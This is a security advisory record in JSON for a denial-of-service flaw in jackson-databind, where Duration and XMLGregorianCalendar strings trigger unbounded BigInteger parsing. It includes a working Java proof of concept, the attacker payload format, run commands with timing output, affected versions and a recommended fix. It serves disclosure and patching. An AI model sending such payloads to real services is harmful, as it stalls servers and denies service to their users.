{"id":"GHSA-q4xh-88c3-wmh7","summary":"jackson-databind: Duration XMLGregorianCalendar Unbounded Number Parse DoS","details":"### Summary\n`jackson-databind` 3.2.1 deserializes a JSON **string** bound to a `javax.xml.datatype.Duration` or `javax.xml.datatype.XMLGregorianCalendar` field by passing the raw string verbatim to `DatatypeFactory.newDuration(value)` / `newXMLGregorianCalendar(value)`. Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into `java.math.BigInteger` / `BigDecimal` using the native `BigInteger(String)` constructor (an O(n²) parser). Because the digits reside inside a JSON **string** token, jackson-core's `StreamReadConstraints.maxNumberLength` guard (which bounds only JSON *number* tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default `JsonMapper.builder().build()` mapper with no polymorphic typing or special configuration.\n\n### Details\n`StreamReadConstraints.maxNumberLength` (jackson-core, default 1000) bounds the **text length of JSON number tokens** only; it does not apply to digits inside a JSON string token (`maxStringLength` default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — `NumberDeserializers` explicitly call `streamReadConstraints().validateIntegerLength(text.length())` / `validateFPLength(text.length())` before parsing a *stringified* number (`NumberDeserializers.java:1063`, `:1139`). The XML-datatype deserializer omits this identical pre-check.\n\n`CoreXMLDeserializers` registers `Std` deserializers **by default** for any field typed `javax.xml.datatype.Duration` or `XMLGregorianCalendar` (`findBeanDeserializer`), with no opt-in required. `Std._deserialize` hands the attacker string straight to the datatype factory:\n\n```java\nprotected Object _deserialize(String value, DeserializationContext ctxt) {\n    switch (_kind) {\n    case TYPE_DURATION:\n        return _dataTypeFactory.newDuration(value);                 // attacker lexical string\n    case TYPE_G_CALENDAR:\n        Date d;\n        try { d = _parseDate(value, ctxt); }\n        catch (DatabindException e) {\n            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string\n        }\n        return _gregorianFromDate(ctxt, d);\n    }\n    throw new IllegalStateException();\n}\n```\n\nPer the XSD lexical rules, `newDuration` parses each numeric component (years, months, …) into a `BigInteger`, and `newXMLGregorianCalendar` parses fractional seconds into a `BigDecimal`. The JDK uses the native `BigInteger(String)` / `BigDecimal(String)` constructors, which are O(n²) in the digit count. A short JSON string such as `\"P\" + \"9\"×N + \"Y\"` therefore forces the allocation and O(N²) parse of an N-digit `BigInteger`, entirely downstream of every jackson-core constraint.\n\n## Vulnerable Code Location\n\n- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137`\n  — `newDuration(value)` (TYPE_DURATION)\n- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147`\n  — `newXMLGregorianCalendar(value)` (TYPE_G_CALENDAR fallback)\n- Registration (default, no opt-in):\n  `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46`\n  (`findBeanDeserializer` returns `Std` for `XMLGregorianCalendar` / `Duration`)\n- Contrast — correct length-guard pattern already used elsewhere in the library:\n  `src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139`\n\n## Proof of Concept\n\nPoC source (`Vuln07_DurationDoS.java`). It uses only the public `ObjectMapper.readValue` API and a default mapper; the only \"special\" element is a normal DTO exposing a `javax.xml.datatype.Duration` field.\n\n```java\npackage com.poc;\n\nimport tools.jackson.databind.ObjectMapper;\nimport tools.jackson.databind.json.JsonMapper;\nimport javax.xml.datatype.Duration;\n\n/**\n * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.\n * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.\n */\npublic class Vuln07_DurationDoS {\n    public static class Cfg { public Duration ttl; }\n\n    public static void main(String[] args) throws Exception {\n        ObjectMapper mapper = JsonMapper.builder().build();\n        int digits = Integer.getInteger(\"digits\", 5_000_000);\n\n        // Baseline small parse.\n        long t0 = System.nanoTime();\n        mapper.readValue(\"{\\\"ttl\\\":\\\"P1Y\\\"}\", Cfg.class);\n        long tBase = System.nanoTime() - t0;\n        System.out.println(\"Baseline (P1Y) parse: \" + (tBase/1_000_000) + \" ms\");\n\n        String big = \"P\" + \"9\".repeat(digits) + \"Y\";\n        String json = \"{\\\"ttl\\\":\\\"\" + big + \"\\\"}\";\n        System.out.println(\"Payload JSON size ~ \" + json.length() + \" bytes (year component = \" + digits + \" digits)\");\n        long t1 = System.nanoTime();\n        try {\n            Cfg c = mapper.readValue(json, Cfg.class);\n            long dt = System.nanoTime() - t1;\n            System.out.println(\"Parsed giant Duration in \" + (dt/1_000_000) + \" ms; years field type materialized as BigInteger\");\n            System.out.println(\"RESULT: VULNERABLE - \" + digits + \"-digit BigInteger parsed from a \"\n                    + json.length() + \"-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)\");\n        } catch (Throwable t) {\n            long dt = System.nanoTime() - t1;\n            System.out.println(\"After \" + (dt/1_000_000) + \" ms threw \" + t.getClass().getName() + \": \" + t.getMessage());\n        }\n    }\n}\n```\n\nMinimal HTTP-shaped payload (what an attacker sends):\n\n```json\n{ \"ttl\": \"P99999999999999999999…9Y\" }   // 'P' + N nines + 'Y', N up to ~100,000,000\n```\n\nAn `XMLGregorianCalendar` field is equally affected via the fractional-seconds path, e.g.\n`{ \"at\": \"0000-01-01T00:00:00.\" + \"9\"×N }`.\n\n## Execution Steps\n\nThe PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain `javac`/`java` (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache `~/.m2`, but any copy works).\n\n```bash\n# 0. Locate the three dependency jars (published Maven artifacts).\nM2=\"$HOME/.m2/repository\"\nDB=\"$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar\"\nCORE=\"$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar\"\nANN=\"$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar\"\nCP=\"$DB:$CORE:$ANN\"\n#   If not already cached, fetch them once, e.g.:\n#   mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1\n#   (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)\n\n# 1. Compile with javac (single source file).\nmkdir -p out\njavac -cp \"$CP\" -d out src/main/java/com/poc/Vuln07_DurationDoS.java\n\n# 2. Quick confirmation (~11 s): 1,000,000-digit year component.\njava -Xmx2g -Ddigits=1000000 -cp \"out:$CP\" com.poc.Vuln07_DurationDoS\n\n# 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.\njava -Xmx2g -Ddigits=5000000 -cp \"out:$CP\" com.poc.Vuln07_DurationDoS\n```\n\nThe `digits` system property controls the number of `9` characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 `maxStringLength` to scale cost further.\n\nEnvironment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default `JsonMapper.builder().build()`.\n\n## Reproduction Evidence\n\nDeterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:\n\n**digits = 5,000,000 (~5 MB payload):**\n```\nBaseline (P1Y) parse: 27 ms\nPayload JSON size ~ 5000012 bytes (year component = 5000000 digits)\nParsed giant Duration in 293175 ms; years field type materialized as BigInteger\nRESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)\n```\n\n**digits = 1,000,000 (~1 MB payload, for fast repeatability):**\n```\nBaseline (P1Y) parse: 53 ms\nPayload JSON size ~ 1000012 bytes (year component = 1000000 digits)\nParsed giant Duration in 11155 ms; years field type materialized as BigInteger\nRESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)\n```\n\nInterpretation: a normal `\"P1Y\"` value parses in tens of milliseconds; a ~1 MB attacker payload consumes **~11 s** and a ~5 MB payload **~293 s** of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) `BigInteger(String)` constructor. The cost occurs inside `DatatypeFactory.newDuration`, downstream of jackson-core's `StreamReadConstraints` (independently confirmed: the same digit sequence supplied as a bare JSON *number* token is rejected with `StreamConstraintsException`, whereas inside a string token it is not bounded).\n\n## Impact\n\nAn unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large `BigInteger`/`BigDecimal` from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a `javax.xml.datatype.Duration` or `XMLGregorianCalendar` field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.\n\n## Recommended Fix\n\nApply the same validate-length-then-parse idiom the core `NumberDeserializers` already use:\n\n1. In `CoreXMLDeserializers.Std._deserialize`, enforce a maximum raw-string length before\n   calling `newDuration(value)` / `newXMLGregorianCalendar(value)` — e.g. reject inputs\n   longer than `ctxt.streamReadConstraints().getMaxNumberLength()` (or a dedicated bound),\n   routing over-length input through `ctxt.handleWeirdStringValue(...)`.\n2. Alternatively, validate the lexical form against a bounded regex and cap the digit count\n   of each numeric component before delegating to `DatatypeFactory`.\n3. Document that `Duration` / `XMLGregorianCalendar` fields bound from untrusted input must\n   be length-limited at the transport layer.","aliases":["CVE-2026-68497"],"modified":"2026-09-28T20:30:05.350632593Z","published":"2026-09-28T20:19:46Z","database_specific":{"cwe_ids":["CWE-400"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-09-28T20:19:46Z","nvd_published_at":"2026-09-11T16:17:39Z"},"references":[{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-q4xh-88c3-wmh7"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-68497"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/pull/6127"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/commit/a99b7e74c8928f43f6975773a8c862c8316178bd"},{"type":"PACKAGE","url":"https://github.com/FasterXML/jackson-databind"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.18.10"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.21.6"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.22.2"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.1.6"},{"type":"WEB","url":"https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-3.2.2"}],"affected":[{"package":{"name":"tools.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/tools.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.2.0"},{"fixed":"3.2.2"}]}],"versions":["3.2.0","3.2.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-q4xh-88c3-wmh7/GHSA-q4xh-88c3-wmh7.json"}},{"package":{"name":"tools.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/tools.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"3.0.0"},{"fixed":"3.1.6"}]}],"versions":["3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.1.0","3.1.0-rc1","3.1.1","3.1.2","3.1.3","3.1.4","3.1.5"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-q4xh-88c3-wmh7/GHSA-q4xh-88c3-wmh7.json"}},{"package":{"name":"com.fasterxml.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/com.fasterxml.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.14.0"},{"fixed":"2.18.10"}]}],"versions":["2.14.0","2.14.1","2.14.2","2.14.3","2.15.0","2.15.0-rc1","2.15.0-rc2","2.15.0-rc3","2.15.1","2.15.2","2.15.3","2.15.4","2.16.0","2.16.0-rc1","2.16.1","2.16.2","2.17.0","2.17.0-rc1","2.17.1","2.17.2","2.17.3","2.18.0","2.18.0-rc1","2.18.1","2.18.2","2.18.3","2.18.4","2.18.5","2.18.6","2.18.7","2.18.8","2.18.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-q4xh-88c3-wmh7/GHSA-q4xh-88c3-wmh7.json"}},{"package":{"name":"com.fasterxml.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/com.fasterxml.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.19.0"},{"fixed":"2.21.6"}]}],"versions":["2.19.0","2.19.1","2.19.2","2.19.3","2.19.4","2.20.0","2.20.0-rc1","2.20.1","2.20.2","2.21.0","2.21.1","2.21.2","2.21.3","2.21.4","2.21.5"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-q4xh-88c3-wmh7/GHSA-q4xh-88c3-wmh7.json"}},{"package":{"name":"com.fasterxml.jackson.core:jackson-databind","ecosystem":"Maven","purl":"pkg:maven/com.fasterxml.jackson.core/jackson-databind"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.22.0"},{"fixed":"2.22.2"}]}],"versions":["2.22.0","2.22.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/09/GHSA-q4xh-88c3-wmh7/GHSA-q4xh-88c3-wmh7.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}]}